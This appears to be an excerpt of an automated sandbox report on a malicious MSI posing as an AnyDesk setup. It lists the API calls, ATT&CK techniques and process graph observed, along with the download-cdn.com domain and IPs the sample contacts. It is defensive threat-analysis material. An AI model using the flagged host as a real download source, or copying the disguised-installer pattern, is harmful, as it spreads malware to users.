      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF709BB0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_00007FF7AF709BB0
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF725604 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,3_2_00007FF7AF725604
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04A09C20 RegQueryValueExA,GetModuleFileNameW,lstrcpyW,lstrlenW,lstrlenW,ExpandEnvironmentStringsW,lstrlenW,lstrcatW,GetEnvironmentVariableW,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,GetCurrentProcessId,GetCurrentProcessId,ProcessIdToSessionId,GetTickCount,GetModuleHandleA,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetProcessWindowStation,GetUserObjectInformationW,GetUserObjectInformationW,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationW,GetUserNameW,GetComputerNameW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,Process32FirstW,Process32NextW,lstrcpynW,CloseHandle,WTSGetActiveConsoleSessionId,lstrcpyA,CreateDCA,CreateDCA,GetDeviceCaps,GetDeviceCaps,GetDesktopWindow,GetDesktopWindow,MonitorFromWindow,MonitorFromWindow,GetDesktopWindow,MonitorFromWindow,LoadLibraryA,7_2_04A09C20
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04A067F0 OpenDesktopW,CreateDesktopW,SetThreadDesktop,LoadKeyboardLayoutA,GetVersionExW,SystemParametersInfoA,CreateThread,Sleep,Sleep,WaitForMultipleObjects,7_2_04A067F0
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      1
      Replication Through Removable Media
      2
      Native API
      1
      DLL Side-Loading
      1
      Exploitation for Privilege Escalation
      1
      Disable or Modify Tools
      11
      Input Capture
      2
      System Time Discovery
      1
      Replication Through Removable Media
      1
      Archive Collected Data
      Exfiltration Over Other Network Medium2
      Ingress Tool Transfer
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts1
      Command and Scripting Interpreter
      1
      Create Account
      1
      DLL Side-Loading
      1
      Deobfuscate/Decode Files or Information
      LSASS Memory11
      Peripheral Device Discovery
      Remote Desktop Protocol1
      Screen Capture
      Exfiltration Over Bluetooth11
      Encrypted Channel
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain Accounts3
      PowerShell
      1
      Registry Run Keys / Startup Folder
      112
      Process Injection
      1
      Obfuscated Files or Information
      Security Account Manager1
      Account Discovery
      SMB/Windows Admin Shares11
      Input Capture
      Automated Exfiltration2
      Non-Application Layer Protocol
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)1
      Registry Run Keys / Startup Folder
      1
      Software Packing
      NTDS3
      File and Directory Discovery
      Distributed Component Object Model2
      Clipboard Data
      Scheduled Transfer3
      Application Layer Protocol
      SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading
      LSA Secrets25
      System Information Discovery
      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common11
      File Deletion
      Cached Domain Credentials41
      Security Software Discovery
      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items121
      Masquerading
      DCSync21
      Virtualization/Sandbox Evasion
      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job21
      Virtualization/Sandbox Evasion
      Proc Filesystem3
      Process Discovery
      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)112
      Process Injection
      /etc/passwd and /etc/shadow1
      Application Window Discovery
      Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
      Rundll32
      Network Sniffing1
      System Owner/User Discovery
      Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture1
      Remote System Discovery
      Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 787624 Sample: AnydeskSetup_26b30163.msi Startdate: 19/01/2023 Architecture: WINDOWS Score: 100 55 Multi AV Scanner detection for domain / URL 2->55 57 Antivirus detection for URL or domain 2->57 59 Malicious encrypted Powershell command line found 2->59 61 3 other signatures 2->61 7 powershell.exe 23 20 2->7         started        12 msiexec.exe 15 35 2->12         started        14 rundll32.exe 2->14         started        16 2 other processes 2->16 process3 dnsIp4 45 download-cdn.com 152.89.196.75, 443, 49695, 49696 NEXTVISIONGB United Kingdom 7->45 35 C:\ProgramData\435f8fae.dat, PE32 7->35 dropped 63 Powershell drops PE file 7->63 18 rundll32.exe 7->18         started        20 conhost.exe 7->20         started        37 C:\Windows\Installer\MSI5344.tmp, PE32+ 12->37 dropped 39 C:\Windows\Installer\4641a8.msi, Composite 12->39 dropped 41 C:\Windows\Installer\MSI4B9F.tmp, PE32 12->41 dropped 43 4 other files (none is malicious) 12->43 dropped 65 Malicious encrypted Powershell command line found 12->65 67 Drops executables to the windows directory (C:\Windows) and starts them 12->67 22 msiexec.exe 12->22         started        24 MSI5344.tmp 12->24         started        26 rundll32.exe 14->26         started        29 rundll32.exe 16->29         started        file5 signatures6 process7 signatures8 31 rundll32.exe 4 6 18->31         started        69 System process connects to network (likely due to code injection or exploit) 26->69 process9 dnsIp10 47 64.190.113.123, 443, 49697, 49698 TRAVELCLICKCORP1US United States 31->47 49 download-cdn.com 31->49 51 System process connects to network (likely due to code injection or exploit) 31->51 53 Deletes itself after installation 31->53 signatures11

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.